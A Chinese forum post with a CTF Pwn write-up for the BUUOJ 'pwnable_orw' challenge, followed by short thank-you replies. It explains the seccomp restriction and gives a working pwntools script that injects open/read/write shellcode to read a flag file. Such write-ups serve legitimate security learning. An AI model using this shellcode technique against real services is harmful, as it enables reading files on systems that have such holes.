吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 5545|回复: 17
收起左侧

[CTF] CTF-Pwn入门刷题WP

  [复制链接]
呆毛王与咖喱棒 发表于 2020-12-20 19:04

主要在BUUOJ上面刷Pwn题,今年的目标是刷完所有的一分题;
每周会写两三道题目的WP;

pwnable_orw

checksec发现是32位

checksec

checksec

使用IDA打开看一下,主要功能是直接输入shellcode,然后执行

main函数逆向

main函数逆向

这个题目前面有一个orw_seccomp函数,这个函数内部调用了seccomp

这是一个之前没听过的概念,会进入linux的一个高安全模式,这种模式下不能执行execve这样的系统调用;

只能执行read、write、open这些

所以这边写脚本需要用shellcraft自己写shellcode,不能直接用sh这样

from pwn import *

io = process('./orw')
elf = ELF('./orw')

payload = asm(shellcraft.open('flag'))
payload += asm(shellcraft.read(3,'esp',100))
payload += asm(shellcraft.write(1,'esp',100))

io.sendline(payload)
io.interactive()

免费评分

参与人数 1热心值 +1 收起 理由
crisislal + 1 用心讨论,共获提升!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

cjc3528 发表于 2020-12-21 12:41
谢谢分享好东西啊
zouludaifeng 发表于 2020-12-21 13:23
lsy832 发表于 2020-12-21 13:23
shelly1314 发表于 2020-12-21 14:50
感谢楼主分享
judgecx 发表于 2020-12-21 16:03
    感谢分享   
hfw 发表于 2020-12-21 16:51
感谢分享
蚂蚁打老虎 发表于 2020-12-22 08:54
感谢大神分享
hackcat 发表于 2020-12-22 09:36
请问PWN入门看啥好?
crisislal 发表于 2020-12-22 09:37
6666真不错
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-26 02:28

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表